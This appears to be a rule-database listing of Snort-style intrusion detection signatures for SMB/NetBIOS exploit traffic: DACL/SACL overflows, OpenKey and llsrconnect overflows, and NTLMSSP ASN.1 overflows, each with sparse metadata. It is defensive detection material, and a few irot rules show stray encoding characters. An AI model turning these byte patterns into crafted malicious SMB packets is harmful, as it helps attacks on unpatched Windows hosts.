alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103046; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103054

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103054; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103040

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103040; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103032

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103032; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103041

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103041; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx DACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103033

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103033; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx SACL overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103049

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103049; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103057

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103057; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103048

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103048; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103056

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103056; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS NT Trans NT CREATE unicode invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103222

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103222; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103223

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103223; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103224

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103224; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103225

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103225; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103413

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103413; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103414

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103414; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103415

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103415; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103416

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode little endian andx attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103416; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode little endian andx attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103001

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103001; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103002

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP unicode andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103002; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP unicode andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103244

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103244; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103245

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103245; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103246

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103246; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103247

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103247; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103118

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103118; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

